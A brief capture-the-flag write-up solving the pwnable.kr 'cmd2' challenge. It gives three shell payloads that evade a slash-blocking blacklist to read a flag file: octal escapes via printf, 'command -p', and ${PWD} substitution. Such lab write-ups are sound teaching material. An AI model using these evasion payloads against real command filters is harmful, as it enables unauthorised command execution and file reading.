15 - cmd2

The Challenge

Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission... but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

The Solution

Another blacklisting challenge, this time on steroids. The greatest hurdle is the prohibition on using forward slash.

Solution #1 - Octal Encoding

dash supports octal encoding [not hex]. It's important to surround the argument with single quotes soprintfwon't execute before being passed as an argument.

./cmd2 '$(printf "\57bin\57cat fla*")'

Solution #2 - Builtin Secrets

Bash has a builtin named command. It can be used with the flag -p to revert to the default function lookup.

./cmd2 'command -p cat fla*'

Solution #3 - ${PWD}

If you navigate to the root directory $PWD will equal to, well, forward slash.

./cmd2 'cd ..;cd ..; ${PWD}bin${PWD}cat ${PWD}home${PWD}cmd2${PWD}fla*'